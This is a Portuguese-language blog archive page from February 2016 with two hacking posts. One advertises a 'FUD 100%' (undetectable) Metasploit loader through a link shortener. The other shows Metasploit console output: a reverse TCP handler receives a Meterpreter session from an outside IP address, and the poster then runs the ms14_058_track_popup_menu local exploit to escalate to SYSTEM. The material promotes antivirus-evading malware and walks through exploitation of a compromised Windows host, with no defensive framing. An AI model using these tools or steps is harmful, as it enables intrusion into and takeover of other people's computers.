Pular para o conteúdo principal

Postagens

Mostrando postagens de fevereiro, 2016

[FUD 100%] Metasploit Loader - Metasploit ReverseDNS

Link Metasploit Loader http://adf.ly/1WO0zC Video:

Windows privilege escalation exploit (track_popup_menu)

[*] Exploit running as background job. [*] Started reverse TCP handler on 192.168.1.3:7000 [*] Starting the payload handler... msf exploit(handler) > [*] Sending stage (957487 bytes) to 179.197.253.231 [*] Meterpreter session 1 opened (192.168.1.3:7000 -> 179.197.253.231:49233) at 2016-02-01 14:15:22 -0600 msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid Server username: MsTutorial-PC\Ms Tutorial meterpreter > getsystem [-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted: [-] Named Pipe Impersonation (In Memory/Admin) [-] Named Pipe Impersonation (Dropper/Admin) [-] Token Duplication (In Memory/Admin) meterpreter > Background session 1? [y/N] Start Privilege Here msf exploit(handler) > use exploit/windows/local/ms14_058_track_popup_menu msf exploit(ms14_058_track_popup_menu) > set SESSION 1 SESSION => 1 msf exploit(ms14_058_track_popup_menu) > run ...